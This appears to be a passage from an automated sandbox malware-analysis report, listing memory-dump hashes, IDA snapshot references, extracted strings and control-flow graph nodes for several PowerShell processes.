                                                                                                              • Instruction ID: 8ae1fed8ba57210b9d1be804d4fe2d6c4723c3a369c8436cf6b3f16637bed71d
                                                                                                              • Opcode Fuzzy Hash: b76fa02aa093108bb1752385b204566156c4bbd2b57ca7f7b070b46d4847b50f
                                                                                                              • Instruction Fuzzy Hash: 0C31B326F1CE6E4EEAAAE61C24116BD72D3DB94B20B5409BBC55FD3196DD04AC00C3A5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3177758443.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b8a0eeb6a2dc663afd52f96365fff8f5ced69c1736ef04eb68e6928bb97e7b61
                                                                                                              • Instruction ID: 4c51a373e92182fc4e0c71f0ca4c43a7f64dbc0fd05b1b6235036b7e01fb46d9
                                                                                                              • Opcode Fuzzy Hash: b8a0eeb6a2dc663afd52f96365fff8f5ced69c1736ef04eb68e6928bb97e7b61
                                                                                                              • Instruction Fuzzy Hash: A931393190CA4C8FDB59EF9CD88A7E97BE0EF69321F04016ED049C7152DA716815CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3177758443.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 86235d5ab7c87581c7179c9217d2aaf64bd3a92142b5567f84c277c141887b73
                                                                                                              • Instruction ID: 8c8360bca3f1ac2c9fe7276487dbf6519683d8f1b2c347fea0ce53ff3af13d05
                                                                                                              • Opcode Fuzzy Hash: 86235d5ab7c87581c7179c9217d2aaf64bd3a92142b5567f84c277c141887b73
                                                                                                              • Instruction Fuzzy Hash: C8214915B0CA5D4FE745F72CA8252BC77F2EF85E1174404BAD04AC7293DD249806C366
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3177758443.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 658623551ad56ef90e59bc662c183007f401aee0521b6f46553c38919d7ac131
                                                                                                              • Instruction ID: ac4cb4fb0658d3a4a53fbf6f727707b9ce43fb0cb2558390b5e1c0d595efb818
                                                                                                              • Opcode Fuzzy Hash: 658623551ad56ef90e59bc662c183007f401aee0521b6f46553c38919d7ac131
                                                                                                              • Instruction Fuzzy Hash: 21313E3181D66E8EFBB9AF58DC05BF932D1FF45718F402939D40D8A092DA396985CA21
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3177758443.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d27572f91d312d438f4eb875b635ae06a5fe66ed096799c5b22025a9a2f8c967
                                                                                                              • Instruction ID: 28a14aec6b440e87d9be3fa869663f85637d2f2330bf730f24ad6e30b2560239
                                                                                                              • Opcode Fuzzy Hash: d27572f91d312d438f4eb875b635ae06a5fe66ed096799c5b22025a9a2f8c967
                                                                                                              • Instruction Fuzzy Hash: 9821A43190CA1C8FDB58EF9CD8867F97BE0EB69321F10412ED04ED7251DA71A815CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3177758443.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9985c45d58834a99bc54ecaaa1fe07230d5698720bd5fbcfae2336cf84ba4323
                                                                                                              • Instruction ID: 99724d6d487fedcbca2439fe2ae163f409cce3ebd643678ef003835677e11ceb
                                                                                                              • Opcode Fuzzy Hash: 9985c45d58834a99bc54ecaaa1fe07230d5698720bd5fbcfae2336cf84ba4323
                                                                                                              • Instruction Fuzzy Hash: A721B071908A0C9FDB18DF58D48ABF9BBF0FB59321F00422ED04AD3511DB60A455CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3177758443.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5ed1c90fef0f50871cf1b923d0e0dc759fb97906ada5989500dfc778120149d9
                                                                                                              • Instruction ID: 9017bb9a11218a723ca05211c0a0f2c81bb8bf2f6b4733baf2042659730c09ca
                                                                                                              • Opcode Fuzzy Hash: 5ed1c90fef0f50871cf1b923d0e0dc759fb97906ada5989500dfc778120149d9
                                                                                                              • Instruction Fuzzy Hash: A621507190CA1C8FDB68DF98D88ABEABBE0EB55321F10452ED04AD3651DA716406CB51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3195232286.00007FFC45C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC45C60000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffc45c60000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 64fc7749aad9e3913bbbe7a840f2bbf04ecbdbc3105d89efab1988c380d61017
                                                                                                              • Instruction ID: 251c6712ff0df3477cb56f24e74336a302a25141a62b7f42a4b231d41ad84a1a
                                                                                                              • Opcode Fuzzy Hash: 64fc7749aad9e3913bbbe7a840f2bbf04ecbdbc3105d89efab1988c380d61017
                                                                                                              • Instruction Fuzzy Hash: 1E21CD4290E7DA8FEB57937808A51A07FA0AF27210F0E04EBC0C8CB1E7D508588AC362
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3177758443.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c2b757b26fa0309384f05434cdd93a0f6ddf4813ff0026ffa397ca4c83f56205
                                                                                                              • Instruction ID: f2c935ff706e85886cec445f5595ccc4fbed984aa5a802c1d202aae347d8a8c2
                                                                                                              • Opcode Fuzzy Hash: c2b757b26fa0309384f05434cdd93a0f6ddf4813ff0026ffa397ca4c83f56205
                                                                                                              • Instruction Fuzzy Hash: F701F53180868D8FDF0AEF28C8059E57BE0EF26351B04029BE44DCB1A2DA25D955CBA2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3177758443.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 16a26f7616ade9a392133d947f4fea45c4b57d19d29ac7b97df0fb6d0e0e39f5
                                                                                                              • Instruction ID: cbe8d1d319bd392e491defee2b289239504159d477386817b8edb6d137f3c5de
                                                                                                              • Opcode Fuzzy Hash: 16a26f7616ade9a392133d947f4fea45c4b57d19d29ac7b97df0fb6d0e0e39f5
                                                                                                              • Instruction Fuzzy Hash: 3B11265885E6D65ED753A33C4C604F27FF8CE8352570D49EBD0E9CA0A3E908195AC363
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3178990009.00007FFC455C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC455C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffc455c0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bb72c65a757e2866034f00c42ae4d904415b0e6cdfa2dc30fab44c6c552ff841
                                                                                                              • Instruction ID: 4eb923e323b62f6dae76657ecc7e1fba284beeb45d0a27f6b5661d2ea9397aff
                                                                                                              • Opcode Fuzzy Hash: bb72c65a757e2866034f00c42ae4d904415b0e6cdfa2dc30fab44c6c552ff841
                                                                                                              • Instruction Fuzzy Hash: 02F0D625F1ED6E0AFAAAA21C24202BD61D3DF84B11B5809BBC55FD3196DC08BC00C362
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3177758443.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 904ddcc0f519508aa89991c4e22db77cdfffe6a81e6581a36432e14cf2a13433
                                                                                                              • Instruction ID: 50631c988c33716542e62ec0d97461e81a4da7e29a2b27a979a660cc78b96f67
                                                                                                              • Opcode Fuzzy Hash: 904ddcc0f519508aa89991c4e22db77cdfffe6a81e6581a36432e14cf2a13433
                                                                                                              • Instruction Fuzzy Hash: 5401677111CB0C8FDB44EF0CE451AA5B7E0FB95324F50056DE58AC76A1D636E881CB45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.3177758443.00007FFC454F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_7ffc454f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d2750d9811ecc41f3ded115260ddb664c819552f6e5737de4a1bb1289b6cdd1a
                                                                                                              • Instruction ID: e66e34dbdf34f268966397eff58588821e1895c5afa1d77a55d869e3bbaeddca
                                                                                                              • Opcode Fuzzy Hash: d2750d9811ecc41f3ded115260ddb664c819552f6e5737de4a1bb1289b6cdd1a
                                                                                                              • Instruction Fuzzy Hash: A9F04C15A0DA9E0FD745E32C58202783BA2EB86740F1801F7C05ECB1D7DD0C9C06C3A2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.3079310620.00007FFC453CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC453CD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_7ffc453cd000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 06ccc712e485ccc2bb34bae1c19df2f4aad08109d43b7343e55d0f53f33a1474
                                                                                                              • Instruction ID: b7ca213eaf2edc9516319448254a2935c8276534d78798a443c7292dd02378cb
                                                                                                              • Opcode Fuzzy Hash: 06ccc712e485ccc2bb34bae1c19df2f4aad08109d43b7343e55d0f53f33a1474
                                                                                                              • Instruction Fuzzy Hash: 41415B7240DBC84FE7579B3898459623FF0EF92320B1505EFD089CB1A3D625A84AC7A3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.3079907340.00007FFC454E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_7ffc454e0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: abe053573e899bdccea0c2b7c77c0df34b7db67b355a885a8e27ae4c1611379d
                                                                                                              • Instruction ID: b3e1e3b4de426564c8a87b75829f2ecfef1cdbd855846f8b26349b3e77208d29
                                                                                                              • Opcode Fuzzy Hash: abe053573e899bdccea0c2b7c77c0df34b7db67b355a885a8e27ae4c1611379d
                                                                                                              • Instruction Fuzzy Hash: C001677111CB0C8FDB44EF0CE451AA5B7E0FB95324F50056DE58AC76A1D636E881CB45
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.3079907340.00007FFC454E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_7ffc454e0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ~E$0~E$8~E$@~E$P~E$X~E$`~E$h~E$x~E$~E$~E
                                                                                                              • API String ID: 0-4242117250
                                                                                                              • Opcode ID: eba7fe9efadbee6a6f74910f0c92af208c416bf8c10a4b8666bcca6623e2e7b8
                                                                                                              • Instruction ID: eed52cd381fb3ca664fc2ecf3ddd2154bb09b751b8aec59312d82c7578f4fba9
                                                                                                              • Opcode Fuzzy Hash: eba7fe9efadbee6a6f74910f0c92af208c416bf8c10a4b8666bcca6623e2e7b8
                                                                                                              • Instruction Fuzzy Hash: E951D683B0FAD74BF975801C7C1553A7BB6DBA2A247095AFBD0484B1DF4C156C06C269

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:3.1%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:3
                                                                                                              Total number of Limit Nodes:0
                                                                                                              execution_graph 8192 7ffc454ee954 8194 7ffc454ee95d LoadLibraryExW 8192->8194 8195 7ffc454eea0d 8194->8195

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 213 7ffc455b39af-7ffc455b39b1 214 7ffc455b39b7-7ffc455b3a3d 213->214 215 7ffc455bb9b3-7ffc455bba0f 213->215 238 7ffc455b3a3f 214->238 239 7ffc455b3a40-7ffc455b3a51 214->239 225 7ffc455bba16-7ffc455bba27 215->225 226 7ffc455bba11 215->226 228 7ffc455bba29 225->228 229 7ffc455bba2e-7ffc455bbac6 225->229 226->225 230 7ffc455bba13 226->230 228->229 231 7ffc455bba2b 228->231 236 7ffc455bbbf5-7ffc455bbcb7 229->236 237 7ffc455bbacc-7ffc455bbad6 229->237 230->225 231->229 293 7ffc455bbcb9 236->293 294 7ffc455bbcbe-7ffc455bbccf 236->294 240 7ffc455bbad8-7ffc455bbae5 237->240 241 7ffc455bbaef-7ffc455bbaf4 237->241 238->239 243 7ffc455b3a54-7ffc455b3b10 239->243 244 7ffc455b3a53 239->244 240->241 252 7ffc455bbae7-7ffc455bbaed 240->252 246 7ffc455bbb95-7ffc455bbb9f 241->246 247 7ffc455bbafa-7ffc455bbafd 241->247 244->243 249 7ffc455bbba1-7ffc455bbbaf 246->249 250 7ffc455bbbb0-7ffc455bbbf2 246->250 253 7ffc455bbb14-7ffc455bbb18 247->253 254 7ffc455bbaff-7ffc455bbb08 247->254 250->236 252->241 253->246 255 7ffc455bbb1a-7ffc455bbb20 253->255 254->253 260 7ffc455bbb3c-7ffc455bbb48 255->260 261 7ffc455bbb22-7ffc455bbb2f 255->261 272 7ffc455bbb49-7ffc455bbb4b 260->272 261->260 270 7ffc455bbb31-7ffc455bbb3a 261->270 270->260 272->272 274 7ffc455bbb4d-7ffc455bbb6c 272->274 288 7ffc455bbb72-7ffc455bbb7a 274->288 289 7ffc455bbb7c-7ffc455bbb80 288->289 290 7ffc455bbb82-7ffc455bbb87 288->290 292 7ffc455bbb88-7ffc455bbb94 289->292 290->292 293->294 298 7ffc455bbcbb 293->298 295 7ffc455bbcd6-7ffc455bbd9b 294->295 296 7ffc455bbcd1 294->296 296->295 299 7ffc455bbcd3 296->299 298->294 299->295
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4236020715.00007FFC455B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC455B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffc455b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: `+0~
                                                                                                              • API String ID: 0-1182919638
                                                                                                              • Opcode ID: f5924d19edcefdb2e4da25e20232ad7f3daf852c6f072fd5b0bb5270992fa57b
                                                                                                              • Instruction ID: 7a7c8e118ebbe3857d86b6c8b1f11f2f0d4dd27756f073a5afce3b833e996229
                                                                                                              • Opcode Fuzzy Hash: f5924d19edcefdb2e4da25e20232ad7f3daf852c6f072fd5b0bb5270992fa57b
                                                                                                              • Instruction Fuzzy Hash: 4D120565D0D7DA4FE757A73858692B47FA2EF53620F1A05FBC089CB1A3E9085C06C362

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 306 7ffc454ee954-7ffc454ee95b 307 7ffc454ee966-7ffc454ee9cf 306->307 308 7ffc454ee95d-7ffc454ee965 306->308 310 7ffc454ee9d9-7ffc454eea0b LoadLibraryExW 307->310 311 7ffc454ee9d1-7ffc454ee9d6 307->311 308->307 312 7ffc454eea13-7ffc454eea3a 310->312 313 7ffc454eea0d 310->313 311->310 313->312
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4225994113.00007FFC454E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC454E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffc454e0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad
                                                                                                              • String ID:
                                                                                                              • API String ID: 1029625771-0
                                                                                                              • Opcode ID: c112e7da6b8a91c036a8a8661b2c1c999f8d00bd2c2ff5a876ce07700dce4a93
                                                                                                              • Instruction ID: c469fed5e98662e3b8f22e03e33950f1a88f029e006efd87f46ce7d4fcf7840d
                                                                                                              • Opcode Fuzzy Hash: c112e7da6b8a91c036a8a8661b2c1c999f8d00bd2c2ff5a876ce07700dce4a93
                                                                                                              • Instruction Fuzzy Hash: 6831D33190CA5C8FDB59EB98D849BE9BBE1FF55320F04826BD009D3252DB74A816CB91

                                                                                                              Control-flow Graph

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4236020715.00007FFC455B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC455B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffc455b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 821a6eca3953c351369272610ebb94be10a99d705fea699db9229ee50e25f6f4
                                                                                                              • Instruction ID: 48e9632a74cc0619738251970265aeda1de7875b57aed49d3c3883bf9666c33f
                                                                                                              • Opcode Fuzzy Hash: 821a6eca3953c351369272610ebb94be10a99d705fea699db9229ee50e25f6f4
                                                                                                              • Instruction Fuzzy Hash: FFA16921D0DB9D4FEB92AB2898546F53FE1EF56220F0406FBD45DC70A3DA18A905C372

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 357 7ffc45a1262b-7ffc45a12687 359 7ffc45a1268d-7ffc45a12697 357->359 360 7ffc45a127a4-7ffc45a127e1 357->360 361 7ffc45a126b3-7ffc45a126c0 359->361 362 7ffc45a12699-7ffc45a126b1 359->362 371 7ffc45a12793-7ffc45a127a1 360->371 369 7ffc45a12745-7ffc45a1274f 361->369 370 7ffc45a126c6-7ffc45a126c9 361->370 362->361 372 7ffc45a1275e-7ffc45a12791 369->372 373 7ffc45a12751-7ffc45a1275d 369->373 370->369 374 7ffc45a126cb-7ffc45a126d3 370->374 371->360 372->371 374->360 375 7ffc45a126d9-7ffc45a126e3 374->375 377 7ffc45a126fc-7ffc45a12700 375->377 378 7ffc45a126e5-7ffc45a126f1 375->378 377->369 381 7ffc45a12702-7ffc45a12705 377->381 378->377 381->369 382 7ffc45a12707-7ffc45a1270a 381->382 384 7ffc45a12715-7ffc45a1271e 382->384 385 7ffc45a12720-7ffc45a1272d 384->385 386 7ffc45a12737-7ffc45a12744 384->386 385->386 388 7ffc45a1272f-7ffc45a12735 385->388 388->386
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4288368950.00007FFC45A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC45A10000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffc45a10000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 78dff642bb9e3ff81faf824ce05187a92629eea5f22050dc1777c1c5e57dd3e1
                                                                                                              • Instruction ID: 19f7ec3d92db981b7adb42dbcbc5732628d497fd85d94c4f3ac9230176f155ba
                                                                                                              • Opcode Fuzzy Hash: 78dff642bb9e3ff81faf824ce05187a92629eea5f22050dc1777c1c5e57dd3e1
                                                                                                              • Instruction Fuzzy Hash: B7510631A0CAAE4FEB99E71D58546BA7BE2EF54714B1805BAC40DC71A7DD14EC01C3A1

                                                                                                              Control-flow Graph

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4236020715.00007FFC455B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC455B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffc455b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 61c9999b0a1b92a1a98fea595bf7e79783b26c6cadb8b34d85643806455e6caa
                                                                                                              • Instruction ID: b744ee625fdf5bb6b6a326412a5b400a7d8de9dd08deb214ceb4a476ef5e2d44
                                                                                                              • Opcode Fuzzy Hash: 61c9999b0a1b92a1a98fea595bf7e79783b26c6cadb8b34d85643806455e6caa
                                                                                                              • Instruction Fuzzy Hash: E851D365C0E7DA0FE793A77858646B13FE2DF57620F0905EBC099CB0A7DA19580AC372

                                                                                                              Control-flow Graph

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4236020715.00007FFC455B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC455B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffc455b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e03f4e67e4c2fc058e3a66a369f60cfea26e105581432ac574ce31b154e2b02f
                                                                                                              • Instruction ID: c4d4e6fc501cff86399c666fffb1706727805ee278e9cd3b0da03b280879b3b8
                                                                                                              • Opcode Fuzzy Hash: e03f4e67e4c2fc058e3a66a369f60cfea26e105581432ac574ce31b154e2b02f
                                                                                                              • Instruction Fuzzy Hash: B3514636F0D96E4FFBA4EA1C58592B87BD2EF44A20B0908BBD01DC7192ED14EC01C362

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 475 7ffc45a145fb-7ffc45a14600 477 7ffc45a14602-7ffc45a14633 475->477 478 7ffc45a14647-7ffc45a14657 475->478 483 7ffc45a146ee-7ffc45a14701 477->483 484 7ffc45a14639-7ffc45a14643 477->484 481 7ffc45a14661-7ffc45a1467c 478->481 481->483 486 7ffc45a14703 483->486 487 7ffc45a14705-7ffc45a14777 483->487 484->478 486->487 489 7ffc45a1489c-7ffc45a148a6 487->489 490 7ffc45a1477d-7ffc45a14786 487->490 492 7ffc45a148b3-7ffc45a148f4 489->492 493 7ffc45a148a8-7ffc45a148b2 489->493 490->489
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4288368950.00007FFC45A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC45A10000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffc45a10000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cdb9ddba76b26e9d5978392d50e6524b920dd4df2cd4426ff9973e39eb5b5d7d
                                                                                                              • Instruction ID: 812ae32cddbb208487235a740ff785a85fdca0aea1832db26b6f25698c121b52
                                                                                                              • Opcode Fuzzy Hash: cdb9ddba76b26e9d5978392d50e6524b920dd4df2cd4426ff9973e39eb5b5d7d
                                                                                                              • Instruction Fuzzy Hash: 65414721A0DB994FE745EB2C58645707BE2EF56710B0809FFD049C71E3ED19AC40C3A6

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 524 7ffc453cee20-7ffc453cee59 527 7ffc453cee6a-7ffc453cee6c 524->527 528 7ffc453cee5b-7ffc453cee65 524->528 530 7ffc453cee6d-7ffc453ceedb 527->530 529 7ffc453cee67 528->529 528->530 529->527 533 7ffc453ceedd-7ffc453ceee4 530->533 534 7ffc453cef0b-7ffc453cef20 533->534 535 7ffc453ceee6-7ffc453ceeff 533->535 536 7ffc453cef03-7ffc453cef09 535->536 536->533
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4217510389.00007FFC453CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC453CD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffc453cd000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b07bebb83a9f7a8919d9efc1b6d0604ed695d7752683ed2df423e4ed11510ab8
                                                                                                              • Instruction ID: 6d87fa239c2980da00f7842d58ded3c4d30f91b51b20c20d77954a0f92763fde
                                                                                                              • Opcode Fuzzy Hash: b07bebb83a9f7a8919d9efc1b6d0604ed695d7752683ed2df423e4ed11510ab8
                                                                                                              • Instruction Fuzzy Hash: C441277141DBC84FE7579B3998419623FF0EF97360B0609EFD088CB1A3D625A846C7A2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4288368950.00007FFC45A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC45A10000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffc45a10000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 24616e94cf7fa9fb1d72f693d729741781873c4e11814cf22115bbf9b4bbea55
                                                                                                              • Instruction ID: 360e64d7beab9b8c4664a8e74d8f3ac18b4641af943d0be2980cf621406fdd80
                                                                                                              • Opcode Fuzzy Hash: 24616e94cf7fa9fb1d72f693d729741781873c4e11814cf22115bbf9b4bbea55
                                                                                                              • Instruction Fuzzy Hash: 67F0E932B0C93E4FF7A5A20D68443BAB2D2EF98725F180576C40DC3695DD14EC2083B0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4288368950.00007FFC45A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC45A10000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffc45a10000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 65b88a1f74f3feb672edb8616b380f1c1ed1853255ffb1ebc022c8fa93461fd2
                                                                                                              • Instruction ID: d9119d40602fb9175635ff97347b5633dd1e00ab07788cef471aae6386025dfb
                                                                                                              • Opcode Fuzzy Hash: 65b88a1f74f3feb672edb8616b380f1c1ed1853255ffb1ebc022c8fa93461fd2
                                                                                                              • Instruction Fuzzy Hash: 11F0E232F0C42D8BEB59A618E4535F973A1EF86221B1809BAC25EC3543ED26781686A1
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.4407040591.00007FF6612D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF6612D0000, based on PE: true
                                                                                                              • Associated: 00000010.00000002.4407004468.00007FF6612D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
